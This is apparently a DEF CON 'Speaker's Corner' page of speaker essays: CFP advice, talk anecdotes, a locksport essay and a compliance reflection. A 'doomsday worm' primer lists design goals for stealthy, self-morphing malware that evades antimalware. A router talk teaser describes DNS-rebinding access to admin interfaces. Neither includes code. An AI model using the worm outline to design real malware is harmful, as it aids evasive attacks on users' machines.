DEF CON Hacking Conference

Speaker's Corner

If you are a past or present DEF CON Speaker and would like to contribute to this page, contact Nikita [at] defcon døt org for more info!

'Twas the Week Before DEF CON

"TO GOOGLE! He proclaimed and searched for his problem, as he cranked up the volume on the new Knife Party album."

Twas the week before DEF CON and all through the house...all the speakers were drinking and finishing their talks. Zack's slides were hardly started and his laundry was dirty, when suddenly a friend cheered "It's beer o'clock thirty".

Out to the bars he sprung into action, looking for drinks and social interaction. With his number of slides only up to five, he decided to cheer "FUCK IT, I'LL DO IT LIVE"

His tool hardly finished as he went to bed, nightmares of attendees booing danced in his head. With Kaminsky in a toga and Keith in his hawk, they force fed him shots while he tried to give his talk.

The dream continued on with his demos breaking, nothing working and everything flaking. He tries to explain what it should have done, realizing that his pants were mysteriously gone.

When next to his bed arose such a clatter, waking up from the nightmare to see what was the matter. His downloads had finished and started playing, new music for DEF CON for much needed raging.

Amid his dreams an idea arose, the solution to why his connections would constantly close. His packet was off by just one bit, he should have resisted the urge to hack it.

Back to coding he sprung into action, typing away furiously with much more passion. TO GOOGLE! He proclaimed and searched for his problem, as he cranked up the volume on the new Knife Party album.

Into the wee hours on his keyboard he typed, trying to fix the bugs with all his might. As the coding progressed, he began to feel like a newbie, continually asking himself "WHY'D I CHOOSE RUBY?!?!".

He makes his final changes and runs the code, hoping for the solution to finally hold. YES! he shouts as the fixes work, commits it to git and goes berserk.

Onto the slides he must now begin, with tens of thousands flying in. From worlds near, far and in-between, some friends he knows and others he's never seen.

He'll see you at DEFCON in just under a week, where we'll start the party with our fellow freak. And through the Vegas days and into the nights, we'll learn something new this year….we just might.

(@zfasel)

Don't forget about the Q&A sessions

"...don't forget about the fantastic opportunities to be had in the Q&A sessions."

A recent conversation about some of the benefits of DEF CON as a speaker and a con-goer made me wonder how many people are aware of the awesome potential value to be had from attending the speaker Q&A sessions.

After each DEF CON talk, the speakers are obliged to attend their allocated Q&A sessions, which are incredibly valuable for both speakers and con-goers alike and are one of the things that makes DEF CON a little different from the rest. At many cons, the speakers disappear into the crowd or disappear to catch a flight out of town, but at DEF CON they're generally available to a much smaller audience for about an hour afterwards.

For the con-goer, generally you're going to get great access to the speakers in a smallish, quiet room with seating to avoid the scrum that surrounds some speakers after a talk at many of the other cons. As a con-goer and a previous speaker I've noticed that although well attended, generally the Q&A sessions aren't over-crowded (with the exception of a small number of talks from the RockStars of the world). This translates to a near unique opportunity to fill in any blanks from the talks or perhaps just get a book signed before the speakers merge into the crowd and you have that whole "I don't really want to interrupt (insert name of speaker) because she/he is talking to other people right now" dilemma.

There's also a superb chance for future collaboration. Last year, a PhD student from Florida Atlantic University attended the Q&A session after our "Weaponizing CyberPsychology" talk and asked some great questions about data mining. We'd stuck to statistical analysis in our research, and had purposely stayed away from data mining and machine learning due to a lack of knowledge in that area. His attendance at our Q&A session and the follow-up email exchanges have led to some interesting work which I'm excited to see the progression of (he has a great looking draft paper). We've also collaborated this year to bring his data mining expertise to a new data set and the problematic issue of mining highly skewed data sets. At many other cons you might need a serendipitous encounter to strike up this sort of relationship, but at DEF CON the Q&A sessions offer an almost unique opportunity to meet in person, exchange ideas and collaborate or not.

So when you attend DEF CON, don't forget about the fantastic opportunities to be had in the Q&A sessions. You might enhance your knowledge or the speaker's knowledge, or strike up a cool collaboration and maybe even a future DEF CON talk (as Nikita mentioned in her CFP post).

How Do I Make My CFP Stand Out?

"...before you get busy bringing sexy back and telling everyone about it, here's a few tips..."

I get asked that question a lot. Sometimes it varies in how it's put, but in principle it's the same question. "What is a good CFP?", "How do I get picked?", "What tricks or tips do you have?". Well, since the CFP just opened and we have some time, I will let you in on the secrets I have. Follow these tips and, so long as your submission is not on the following, you should make your way past round one.

It's advised not to submit a CFP on:

  1. A vendor talk.
  2. Talks unrelated to "hacking".
  3. How I used Neurolinguistic Programming to bring back a cancelled Joss Whedon series.

Actually, I'd probably be a big fan of option 3. It's something I have not seen yet, and before you ask, no, a movie to tie up loose ends doesn't count. So, before you get busy bringing sexy back and telling everyone about it, here's a few tips from a glorified teacher's aide.

Don't waste time. Answer all the questions. Fill in all the blanks. Follow directions.

I now have a twitchy triggered response to incomplete CFPs, thanks to endless half-answered applications which leave us wondering about the motives of the submitter. Be sure to clearly fill in how much time you are submitting for, the name of the talk, and if you actually read the terms of agreement, sign them. If we don't know what you want, we can't decide if we want to give it to you. Think of it like this: while we are waiting for you to respond, we are reading a paper from the other guy. The more information you give us, the better. Sending a submission back for more info is a time wasting process for all parties. You want us to get back to you quickly right? Not *that* quick, I'm guessing.

Details, Details, Details.

Please fill out a detailed outline. Detailed outline > monosyllabic bullet-pointing technique. You want to write an outline as if you are walking through your talk. It should give us a clear idea of what you are going to discuss. A detailed outline should have a beginning, middle, end, and a clear dénouement, or find yourself voted off the island.

Bad Outline:

Meh
Meh Meh
Meh Meh Grunt Meh.
I'm done here.


Good Outline:

  1. Intro
    1. Who am I?
    2. Why this talk is relevant to your interests.

  2. Background on Subject.
    1. Who is Joss Whedon?
    2. Early works in TV, Biographical.

  3. Establishing Precedent.
    1. The first show cancelled to invoke fan boi rage.
    2. The many more to be cancelled.
      1. Cancelled before they are even written.

  4. Things that cancel TV Series.
    1. It's obviously interesting.
      1. Define interesting.
    2. Cast includes attractive and intimidating female characters.
      1. Vampires, Cannibals, Demons.
      2. Uncomfortable employee/employer relationships.
    3. Target audience examples.
      1. Virginal
      2. Enjoys one or more table-top RPG.
      3. Loves nicknaming themselves and substituting fictional words for cursing.
      4. Will buy a single season series on blu-ray.
      5. Even when they already own it on DVD.
      6. Because there is 5 minutes of extra footage.
    4. A "River" runs through it.
      1. Why do Summer Glau's series mysteriously end?
      2. Is she cursed, will she always jinx it?
      3. Other common themes in cancelled Whedon series.

  5. Making the madness stop.
    1. Follow up movies and fan-made fiction.
    2. Completing the series via graphic novel.
      1. Why this is not good enough.
      2. How to know if you might have a problem with commitment.

  6. Gorram Mind Control.
    1. What is NLP
    2. Not using it to pick up chicks.

Cont...you get the point.

Where's the Beef?

Narrow it down, slow your roll. Make sure your topic, presentation title, and abstract are specific. Don't be vague with your subject matter or try to conceal the "meat" of your talk. That will bring us right back to rule number one. Take the following example into consideration: SQL < SQL Injection < Lateral SQL Injection in Oracle, OMGBBQFTW!

Nothing is worse than too vague an application, rife with cryptic text about an undisclosed vulnerability that you don't want to tell us about (and you probably shouldn't anyway, because it will destroy the world or at least overflow a few oil tankers at sea), but you will tell us once we accept your talk.

In all the years I've worked for DEF CON, I can promise you that neither I, nor anyone else in our employ, has passed on or leaked information from a submission. We do consider your submission an honor and we wouldn't break the trust you placed in us, or our reputation for keeping our lips shut. Now, if you DO have some super leet destructo 'sploit, we would encourage responsible disclosure, and we might not accept you if you didn't give all parties a fighting chance to patch up before word gets out. We're not looking to line the walls with cease and desist orders and expensive legal costs. Personally, I hate having to re-arrange the speaking schedule at the last minute due to cancelled talks.

You don't always have to provide working code, or a live demo; if we need it then we will ask. Proof of concept is nice, and a white paper or rough draft of slides go a long way in letting us see that you are serious and have put in the work. Additional materials show you put in the time. Please also remember to put adequate time into making those additional materials legible and print friendly. White text on a black background and "Matrix" slide after slide is detracting. Scantily clad or nude women in your slide deck do not add to the value of your talk either. Support your work with content, not flashy distraction. We don't go around accepting talks willy nilly because we like your jokes and jpegs.

We want new, interesting, documented, researched, and preferably never before presented submissions that are concise and clear. Even if you have presented this talk before, how are you going to make it better for us? Yes, I said it, BETTER for us. We want our content to be better than everyone else's. That's not egotistical, it's high standards.

We like talks where you took an idea and ran with it; however, we don't like it when you run off with someone else's work. We like talks that reference the work of others or prior art. Give credit to your inspiration: if you got an idea from sitting in a DC 19 talk, say so and let us know how you added to it. How did you contribute further, and how can the audience add to it? Where did you get your information? Saw a UAV at a hackerspace last weekend and built a bigger, better version? That's cool. Let's see some photos of version 1.0.

Sifted through endless research papers to back up your claims? Cite them. The attendees want to know where they can go after your talk to learn more; sometimes that might be you, and sometimes you might recommend reading a book or two to get started. We want to see submissions that expand the learning experience beyond 50 minutes at DEF CON.

What if your work is "incomplete"? Let's say you know you have enough content for a turbo talk, but your team is not done with the project and you might want to bump it to an hour later. Include what you do have now and leave a footnote explaining your intentions. You can always update your CFP, and you can always ADD to your talk, so long as it doesn't drastically alter the subject matter or decrease the value. If you are communicative with us we can make anything work.

DON'T say you have a tool or an exploit when you don't.

Don't pimp your employer and don't try to sell something. There are a lot of other conferences that accept proprietary software talks where men in suits talk for an hour straight about how their tool is the best tool for pen testers and all other options are unworthy. Worse still is a hidden sales talk in disguise. Five minutes out of 50 explaining how to do something outside of your product is not a healthy relationship.

I am the last person to criticize spelling and grammatical errors, so if I am gawking at the obvious errors, you have problems. A courtesy spell check is all I ask for. Word to the wise: we prefer submissions in English, not alphanumeric leetspeak; it's not as cute as you think.

Be flexible.

If you want to speak at DEF CON, prepare to speak on Sunday. Even if it's the last talk of the day on Sunday, take the slot and don't worry that "people won't see it". They will see your talk, there were upwards of 12k attendees last year, and no room had crickets chirping. Besides, they are recorded, so if they miss your talk at con, they will see it later. It will be on record for many years to come. The same goes for Friday, not everyone can speak on Friday, regardless of how much you want to party or "get home early".

If we ask you to cut or extend your talk, consider it. We might be trying to fit you in the schedule with less time because it's already full. Or we think your talk would fit well in sequence with another talk, if only it was a little longer.

If we want to see a demo, or request more info, consider sending us your best promptly. We might have another submission that is similar to yours and we can't decide which is "better".

"What makes a good speaker once I AM Accepted?"

Read your emails thoroughly. Especially if they come from me.

Meet your deadlines.

Submit presentation materials.

Cite your references, watch the umms and ahhs, and avoid running over or under time.

Focus on making your content the best it can be and your talk, "the" talk, to be in.

You can make it fun too, include waffles if you want to, but your content should stand its ground regardless of theatrics.

Write a speakers corner to address the public with a sneak preview of your talk.

Don't pass up opportunities.

Don't specifically ask not to speak at the same time as another speaker. Three other people will have to speak opposite of Dan Kaminsky or Adam Savage. How do you know that other speaker wouldn't rather be listening to your talk and is bummed they missed it?

Lastly, make sure you are available to the public for questions and discussion; don't isolate yourself from attendees. Go to the Q&A Room after your talk, hang out and talk to people. The guy you might hang out with all night at con might have submitted a similar talk; maybe next year you team up and become like wonder twins or something.

Consider the following linkage to feed your brain.

Speaking and Research Tips:

http://www.aresearchguide.com/3tips.html
http://www.speaking-tips.com/
http://cameronmoll.com/archives/2009/02/20_tips_better_conference_speaking/
http://www.archive.org/details/2009-04-jscott-presentationpresentation
Strom Carlson: http://www.youtube.com/watch?v=_wb2b69JNU8
http://www.aresearchguide.com/1steps.html
On Submitting: http://defcon.org/html/links/dc-speakerscorner.html#daniel-cfp
On Advice: https://www.defcon.org/html/links/dc-speakerscorner.html#wiseman-street
On Attitude: https://www.defcon.org/html/links/dc-speakerscorner.html#idols-moyer
Just read them all: https://www.defcon.org/html/links/dc-speakerscorner.html
Past Show Archive: https://www.defcon.org/html/links/dc-archives.html

A PRIMER ON AN INTERNET DOOMSDAY WORM

"Can a doomsday worm shut down the Internet?"

This is a theoretical primer to bring out a discussion about whether an Internet doomsday worm can be created that is so intractable that it cannot be eradicated. This worm could also have the ability to carry multiple weaponized payloads. Can a doomsday worm shut down the Internet? I don't think anyone could shut down the Internet, but I believe a worm can definitely create access problems. To look at some of the requirements for this worm, I think the best model to look at is a biological one.

The AIDS virus has confounded medical science for a number of years. It seems to be one of the most successful viruses in modern history. From the article "Why Diseases Such As AIDS Are So Successful and So Deadly": "Cell-to-cell transmission is a thousand times more efficient, which is why diseases such as AIDS are so successful and so deadly," writes Mothes. "And because the retroviruses are already in cells, they are out of reach of the immune system."

Cell-to-cell transmission is a thousand times more efficient. I think the best analog to this is social networking sites that have the greatest transmission throughput.

On the second line, "They are out of the reach of the immune system": if you take a corporation with 1,000 nodes that are infected, it's easy for data security to push down a solution and remove the worm. The PCs that are actually outside the immune system are almost always home PCs, iPods, Android phones, and small network PC groups.

What else can we learn from a biological model? If you walked into the middle of a crowded room and asked if anyone knew Mary Mallon or Gaetan Dugas, you would probably get a lot of blank stares. Gaetan Dugas was AIDS patient zero, and Mary Mallon was the infamous Typhoid Mary. They share some similarities that helped them to infect a lot of people. They appeared healthy and did not have any outward signs of any health issue at all. The gestation period for AIDS was more than 10 years, and Dugas infected a lot of men. Mary Mallon was a cook. She handled food and utensils, and at one time, she worked in a hospital. Mary was a carrier of typhoid but did not get sick herself. Some of these ideas could build a good model for a worm.

With the above and what I know about malware, let's build a model:

  1. It would have to operate in the noise level of the Internet.
  2. It would have to behave as a WebCrawler or spider to stay off of the radar of malware companies.
  3. It would have to infect its hosts with minimal discomfort; that is, minimally slow them down, or make it appear as if it was not a type of malware that somebody would want to take the effort to remove.
  4. It would have to infect very slowly.
  5. It would have to be self-aware—it would have to recognize itself trying to re-infect a host.
  6. A model would have to be built for it to judge how its growth rate would have to be modulated.
  7. AIDS had a gestation of up to 10 years. A gestation time on the Internet of only one year would be an incredibly long time.
  8. The worm would have to be modular enough to take different payloads.
  9. It would have to try to infect just home PCs. Home PCs have been deluged with strange malware and bogus antivirus pop-up ads. Recently, Microsoft tried to issue a malware solution. This antimalware flagged Google Chrome as a Trojan, and actually removed Google Chrome from a number of PCs.
  10. It may also contain code to write to places on hard drives that are normally inaccessible to antimalware programs.
  11. It would have to self-morph; it would have to evolve.
  12. It would have to be able to present different signatures to antimalware.

I got the idea for a doomsday worm from a Chinese hacker website. I don't speak Chinese, so I had to use Google Translate, and as they say sometimes things get lost in the translation.

Submitting to the DEF CON CFP

"You do stuff, you know stuff, and you have the stuff, now it is time to share it."

It is that time again; the DEFCON Call for Papers is open. Get busy, submit your stuff. You do stuff, you know stuff, and you have the stuff, now it is time to share it.

But first: pause and actually READ the CFP announcement (at http://www.defcon.org/html/defcon-19/dc-19-cfp.html). Read all of it. Now, think about what you have that you want to share and ask yourself which of the session lengths and formats is best for your content. Got it? Great, it's time to start assembling your proposal. Look at the CFP form (http://www.defcon.org/html/defcon-19/dc-19-cfp-form.html). Look at it, but do not start filling it out right away. There is specific information requested, in specific formats – it would be a great idea to provide that information, all of it, as requested. Assemble a coherent proposal, double-check it, head back to the CFP form, submit, and good luck!

A few more tips:

1) Follow the directions. Yeah, I know I just said that, I'm saying it again. This is one of the best ways to "hack" a CFP and get accepted (or at least not be first rejected), follow the directions.

2) This is not an English major's thesis, but you still need to proofread your proposal. Check your spelling and grammar, and make sure your proposal makes sense. Speaking at DEFCON means that you are communicating with hundreds or thousands of people in your session. If you cannot effectively communicate your ideas to a few folks on the speaker selection team you may not be the best candidate for speaking at DEFCON.

3) Be concise. That does not mean your submission has to be simple, or short, but it needs to get to the point, and have points to make.

Think about it this way, if you were staring at a DEFCON-sized pile of proposals would you like to read train-wreck paper after incomplete paper for hours on end – in your spare time, as a volunteer? I didn't think so. Do you think that a few hours into the pile the complete and correct CFP proposals would start to float to the top? Yeah, thought so. Make it easy on the staff, and improve your chances at getting accepted.

See you in August.

Stop. Think. Connect. A Special DHS PSA Contest.

"I can only imagine the hilarity that would ensue in a minute for a video entitled 'How to not be a Noob' or 'Phishing & Trolling, not what it was in Grandpa's day.'"

Howard Schmidt, Special Assistant to the President and Cyber Security Coordinator, has issued a special PSA Contest. This crowdsourcing campaign is an effort to alert the general public to Stop, Think, then Connect when it comes to their online presence and responsibility. Good, bad, or otherwise, I would really like to see what the DEF CON community comes up with.

I am confident that our DEF CON community could come up with some pretty interesting feedback in regards to this contest; I'd love to see and hear the creative ways you would advertise to the general public. I can only imagine the hilarity that would ensue in a minute for a video entitled "How to not be a Noob" or "Phishing & Trolling, not what it was in Grandpa's day." Overall, I have had a love for PSAs since I was a kid. A lot of us remember and have a special place in our hearts for the PSAs of our youth, especially ones of the "The More You Know" variety. Who didn't like watching "This is your Brain on Drugs" or GI JOE telling us that bullying is wrong? I know I did, and "Knowing is Half the Battle".

From the contest:

"Keeping the Internet safe is a responsibility we all share. We need to take time to stop and think before we connect to the Internet, share information online, or participate in online communities. But sometimes, a creative and compelling reminder can help. That's why the Department has kicked-off the Stop. Think. Connect. PSA Challenge – because all Americans have an important role to play in securing the Internet. We are looking for videos that will help educate Americans about Internet safety and what we can all do to protect ourselves and our families online. If you know what it takes to get Americans motivated to improve their safety online, then we need your help. We want videos that inspire Americans to Stop. Think. Connect."

For details on the requirements and how to submit visit the contest page at: http://www.dhs.gov/files/events/stop-think-connect-psa-challenge.shtm

PSAs must include at least one of the following Internet safety tips:
* Keep a Clean Machine
* Protect Your Personal Information
* Connect with Care
* Be Web Wise
* Be A Good Online Citizen

In similar fashion, I'd love to see if anyone out there posts something on:
* Understanding Encryption
* Surfing Anonymously
* Using Proxy Servers or Feed Over Email
* Understanding Copyright, TOS agreements, and Privacy expectations.
* Who and What is a Troll and how to defeat them.

This past year we had a few talks from both the offense and defense perspectives; check them out on the DC 18 archive. There are too many that fit this topic to list, and you might find something that inspires you. I hope you guys & gals out there send in a submission; if you don't want to submit to the official contest, can you send us a link instead? These PSAs would be great to show at DEF CON 19, and if we can, we'd probably like to share some of your clips online so we can get the word out to "Stop. Think. Connect." The contest runs until Feb 14th, Valentine's Day, so send in your love, send us links, let's get this PSA party started.

Good luck!
Nikita

@niki7a on twitter.
Nikita@Defcon.org

Feel free to comment or introduce your own insights for this discussion on the thread for this article on the DEF CON Forums!

How Did We End Up Like This?

"...compliance issues are driving and defining both security and budget in businesses large and small, and that means a lot of hackers' day jobs are touched by PCI."

Earlier this year I participated in a panel discussion on PCI at DEF CON. Yes, PCI at DEF CON. It was actually a very lively and informative discussion, and the follow up in the Q&A room was informative and *very* lively. While I am honored by the opportunity to speak at DEF CON, and to share the stage with several people who (unlike me) actually know what they are talking about, I do have one question that keeps tormenting me:

How the hell did we get to the point that PCI is a topic that draws a crowd at DEF CON?

I don't think there is any one answer, instead there are several. Here are a few:

First, I think part of the draw of candid conversations about PCI is that compliance issues are driving and defining both security and budget in businesses large and small, and that means a lot of hackers' day jobs are touched by PCI. It doesn't matter whether you are a network admin, outside pentester, manager; anyone who is involved with regulated systems or data feels the impact to varying degrees. Even people who have nothing to do with information security may feel the budgetary impact of compliance. I think those indirectly involved with compliance are starting to see this, and take an interest – and there have been almost no conversations designed to engage or inform the technical InfoSec practitioner audience.

Another factor is that while we rarely "grow up", people in the hacker community frequently grow older (often at an alarming rate). This occasionally means ending up in jobs with words like "manager", "director", or even "chief [something something]" in their titles. These poor folks can't get away from compliance. They may still go to DEF CON, but they've probably been to a lot of "Business of InfoSec" conferences lately, too. And candid conversations aren't always what you get at those kinds of vendor-driven events – so a hacker con take on the issues may appeal to them.

There is also the issue of management-speak, which is a foreign language to some DEF CON attendees. While this may eventually be career limiting, it shouldn't limit anyone's access to information. We have tried to keep our discussions "non-denominational", and minimize or at least explain the acronyms and jargon used. A related thought – it is possible that our inability to effectively communicate security issues to senior management leaves them vulnerable to believing that complying with a security regulation means they are secure – but that is another talk for another year.

Note: it is important to remember that it isn't just PCI, there are a myriad of other regulatory requirements in the wild, but PCI seems to be the poster-child for regulatory issues.

And finally, there is DEF CON itself. While many people (mostly those who have never attended) have a pretty narrow view of DEF CON and of those of us who attend, we know better: it is a dynamic event with a dynamic audience, and the mix of content highlights that. Thanks again to the DEF CON team for giving us the opportunity to bring this topic to a wider audience.

Feel free to comment or introduce your own insights for this discussion on the thread for this article on the DEF CON Forums!

Experiences of a First Time DEF CON Speaker (Part II)

"In short, I like to laugh and learn and that's how I like to communicate..."

Previously I wrote about my experiences as a first time DEF CON speaker prior to speaking. Now it's only fitting that I complete the story and write about my experiences shortly before, during and after speaking, hopefully encouraging future would-be speakers.


A Few Weeks Before the Con

In the weeks leading up to the con, I found myself pretty focused on presentation content, how could I best get my message across and how did I want to deliver it? I spent time looking at previous talks to see what worked well, especially in terms of what level (skill-wise) to pitch the content at.


Choosing a Presentation Style

I generally prefer talks that are fun and/or where it's clear the speaker is passionate about his subject. In short, I like to laugh and learn and that's how I like to communicate (when possible of course, and it's not always possible in a corporate environment). Obviously, you need to choose a style you're comfortable with and that fits your content; it's unlikely the less serious approach will work for deep technical talks.


Creating Content (Slides)

A number of friends and co-workers all offered to be guinea pigs and sit through a rehearsal, timing the talk and suchlike. Well, I'm not really that kind of person. For example, for my wedding speech, I wrote some bullet points down about 3 hours before the ceremony, and the speech seemed to go down well. I typically adopt the same approach (outside work) for other talks and mostly it works out. So I was opting for a similar approach here.

I decided to use slides predominantly as visual support rather than things to be read, i.e. a lot of pictures. Now, I'm no Johnny Long, but that style of presenting and receiving information appeals to me the most.

I outlined roughly 120 slides and had a reasonable idea what I wanted to say for each slide. 120 slides, for 50ish minutes? In your face, "effective presentation skills".


Timing

OK, so I did sort of test the timing out for this talk, as I tend to run over if I'm not careful. I opted to time by sections rather than slide by slide, by reading through the slides over a beer in the hotel. For example, section one took 15 minutes, section two 20 minutes and section three 25 minutes, making 60 minutes in total. Fine for Blackhat with 15 minutes to spare, but I'd have to knock ~15 minutes off for DEF CON. I figured I'd talk faster at DEF CON... simple really.

The benefit of timing by section is that you can easily keep track of whether you need to speed up, or whether you want to slow it down a bit. Timing by slide can get a bit too distracting. FWIW, the Keynote presenter display really helps here.


Understanding the audience

This is something I agonized over for hours, always considering whether the audience would get bored stupid by a slide, or worse still a sequence of slides.  To reduce boredom and to ensure that people didn't feel short changed, I took a leaf out of Michael Schrenk's DEF CON 17 talk and made the agenda and goals clear, i.e. this is what I'm talking about, and this is what my aim is: "leave interested enough to try stuff out or read more".

I also added a quad chart to highlight that n00bs stood the best chance of gaining a lot from my talk, while experts were free to stay and heckle.


White-paper

The white-paper was to prove useful. I used it as a place to go to town on "the science" and reference any research I'd stumbled across on the topic. This way, the talk could entertain and, if people were sufficiently interested, they'd seek out references and step by step instructions in the white-paper.  This really gave me some freedom with the talk.

Note: I still have to follow up with a couple of people looking for code. I haven't forgotten.


Nerves. Night before

I anticipated some nerves for sure, but I was also hit by something a number of other con speakers get... it's the "oh shit, the other talks are much 1337er than mine and I don't deserve to be here" syndrome.

The fact is, you're there, DEF CON critically reviewed your Call For Papers entry and you do deserve to be there. Still, it's a harsh slap in the face when it dawns on you what others are talking about. When people are "jackpotting" ATMs and "dropping 0-day", you naturally get a little freaked out.

The best advice I can give here is to just get on with it, because ultimately, if your talk bombs, it's not the end of the world. Secondly, it's a fantastic opportunity to be able to speak at these cons; savor each moment as it may be your last.


Nerves. 60minute countdown

Everyone has different ways of dealing with it and some lucky buggers don't get nervous at all.  I tend to avoid people where possible.


On Stage Tech FAIL:

The proctors/goons are awesome and really help to put you at ease.  I also grabbed a friend/goon (alien) to help me get rigged up. Usually I can get my Mac working on the big screen no problem, but put me in front of an audience of ninjas, watching my every mouse click, and that's it, I turn into "Never used a computer before man"... so thanks alien for helping sort the display FAIL out ;-)


On Stage:

So you're there, what are you most comfortable with, holding the mic or speaking into a mic on a stand?  Heck, I play rock-band, I wanna hold the mic and walk about a bit, or at least feel like that's what I'm doing.

The first couple of minutes are the worst.  Deep breath, slow it down and go with your opening gambit. I typically like to break the ice, so I introduce Helga.

After the first couple of minutes, I felt that I was pretty much in my stride and began to really enjoy the experience and it is a great experience.


Post talk

Ignoring the overwhelming sense of relief, I was really excited by the level of interest and follow on discussion (in the breakout room, via email, in person etc).

I got speaking to a number of people, including visualization experts such as Raffael Marty (http://www.secviz.org/); I'm just a hobbyist, that guy's a real viz-pro. I got talking to social network ninjas, investigative journos and other con speakers (new and old).  Speaking brought me in contact with others sharing my interest in the topic. For me, this is probably the primary benefit of speaking.  Made some great friends too.


Follow on

A couple of people really seemed to like the talk and wrote it up here and here. That was a really welcome surprise.

Most recently, the talk led to an article in a U.K. national newspaper (The Daily Mail) and an appearance on the Breakfast TV show Daybreak.  It's funny seeing yourself described as "an expert", especially when you really don't think you are; I mean, lets face it, this stuff isn't Kernel Hacking Science.


Conclusion

A great experience.  Talking put me in contact with a community of people engaged in visualization and investigative fields and opened doors for some truly excellent experiences and discussion.

Oh, and the signed DEFCON skateboards generated roughly $1,500 for Hackers For Charity and EFF  (here's a pic of the EFF deck with a Klingon..)


Will I do it again?

I really got involved by accident this year, just thinking that a talk on data visualization and social networks might encourage others to play, so, as for speaking again, if a talk springs to mind I'll be submitting a paper for sure. Mostly I hope that my experiences inspire other people to have a go.

Feel free to contact me via any of the methods on my website here and here's the links to slides, white-paper, audio and video.

My Secret Locksport Agenda

"That's 700 more people I'll never have to explain myself to!" There is an awkward moment for those who pick locks for fun: telling friends and family about it. Many people have an immediate negative reaction to the thought of picking locks:

"Isn't that illegal?" -- "You're a thief?" -- "I better not see you around my house!"

Sometimes it upsets friends and family so much that they stop talking to you. I was lucky; only one family member reacted this way. I was naive; happily chatting to anyone about my new hobby turned many people off. After a year of getting rebuffed and accused I learned to hide what I love most. I love locks -- I'm fascinated by them. I find the smell of brass and grease invigorating. Until I became interested in locks I thought people who were obsessively passionate about something were absurd and lying about how much they loved it. I had no idea. When it comes to locks I am wholly consumed, so keeping mum was frustrating. There were places I could talk about it and people who didn't care or were into it, but when I met someone new I'd talk about anything but locks.

Then I went back to Holland.

When I first learned to pick, Barry Wels convinced me to attend the Dutch Open (now LockCon) in the Netherlands. The first year I attended I didn't know anyone and was stunned by the talent and knowledge in the room. My experience was a constant state of awe. The second year I knew more and had established myself as a strong picker at DEFCON 15. My focus was on the competition: how far I could go and who I could beat. I was taken by surprise when Arthurmeister gave me a bear hug when I walked through the door. I was distracted by these people who had become my friends. On the ride up to Sneek I traveled in the back seat of a friend's car with his children. We didn't speak the same language so we made faces and took pictures with my new camera and they taught me little games. It was really endearing.

This particular year the conference was around a local holiday where children run around with paper lanterns begging for candy. A few of the adults took the kids into town to go door to door. We would sit down to big family style meals and I was amazed at all the people who remembered me and were happy to see me. The whole thing felt like a family reunion. Then it was time for the competition. I tried to focus and be serious but I was scolded by some Germans who told me to have fun. I looked around and saw kids peeking in from the doorway, excited and cheering for their parents.

I left with a much different view of locksport and the community, one that has been reinforced every year. The overriding theme of LockCon has been, for me, normalcy. This is where everyone is excited about locks, curious about new ideas, and, more importantly, where friends and family can spend a weekend catching up and finding out about each other's lives. Sinterklaas even stopped by once!

So, I started talking locks again with friends and pretty girls I was trying to get to know. It's not the first thing I talk about, I try to play it cool, but when it comes up I can't help but show my passion for it with excited babbling and an inspection of their keys. There was a bigger change, too. I started talking to other people about it, people I'd never met and large audiences. I began doing interviews and workshops and suddenly found myself profiled in a local free weekly. After my profile in the Boston Phoenix I landed a story on All Things Considered and a bio in the Boston Globe. I started honing what I wanted to say about Locksport and what I love about it. I appeared on the History Channel and doubled the number of speaking engagements I do each year. I've started doing workshops for new audiences. My mother even got involved and connected me with a mystery book author's conference where I'll be on a panel of experts discussing attacks and forensics for the literary mind.

All of this has stemmed from the same idea: normalcy. I love DEFCON and the hacker conferences, but I want to speak to a wider audience so the next time I'm being introduced as a competitive lockpicker at a dinner party I don't have to spend 10 minutes explaining that I'm not a thief, not going to break into their home and that yes, in fact, this is legal. I don't care if people pick -- I am not on a mission to convert anyone to locksport. I just want them to have heard of it. To know that it exists and be prepared when they hear a friend or loved one picks locks. My ideal is to have people be absolutely indifferent. I don't need anyone to love what I love, but I don't want them to hate that I love it.

Now I'm embarking on my newest venture, launching my own line of lockpicks. I'm proud of them and I think they will be successful in the locksport community. I have had incredible support from them both developmentally and financially, but I'm not making picks for them. I'm making them for the world. I want to spread the knowledge of locksport via marketing. I want to expand the market, catch the curious and let people know that this exists. I'm launching my picks via Kickstarter, an all-or-nothing funding platform that depends on individuals pledging small amounts of money to back your project. I set the lofty goal of $6000 and as of this writing, have raised over $50,000. I cannot tell you how exciting it is that many, if not most, of those individuals backing my project had never heard of Locksport, didn't know of its potential for social acceptance and jumped on the boat anyway.

This will be the first set of lockpicks many of these people ever own. That's thrilling to me. When I look at the backer list I think to myself, "That's 700 more people I'll never have to explain myself to!" So, it's selfish, to be sure, I just want people not to gawk at me when they find out what I do. I think we'd all like to be taken at face value a little more often -- I'm just taking a more direct route to making that happen.

Hacking Millions of Routers

"Given the number and popularity of the affected routers, this translates into many millions of vulnerable routers deployed world wide..." After having attended the past couple of DEFCONs, I'm really excited to be speaking at DEFCON 18 this year. In anticipation of my presentation, "How to Hack Millions of Routers", I thought I'd take this opportunity to answer some questions, offer some background information, and give a quick teaser about the talk.

Most people assume that because they don't have remote administration enabled on their router, external attackers cannot access their router's administrative Web interface. However, for many routers this is simply not true; anyone with a registered domain can in fact gain full interactive access to the router's internal Web interface in order to exploit vulnerabilities or log in to the device (either via the router's default password or a brute-force attack), at which point they can view settings, change settings and generally do whatever else they want with the router*. However, this attack is not restricted to the primary Web interface; it can also be used to gain interactive access to SOAP-based services running on the router as well, such as Universal Plug-n-Play which requires no authentication at all. While this attack does not work against all routers, out of thirty different routers tested the attack was successful against more than half of them, including the venerable WRT54G from Linksys, ActionTec routers used by Verizon FiOS and DSL customers, and many others. Given the number and popularity of the affected routers, this translates into many millions of vulnerable routers deployed world wide, not to mention all the other routers that have not yet been tested.

The attack is actually a combination of many things, from browsers and JavaScript to firewalls and TCP/IP stacks, but it ultimately centers around DNS rebinding*. Although DNS rebinding has been publicly discussed for almost 15 years, many people still don't completely understand it. I've gotten several inquiries about the talk, and they generally boil down to two basic questions:

1) What is DNS rebinding?
2) What is so special about the DNS rebinding technique presented in this talk?

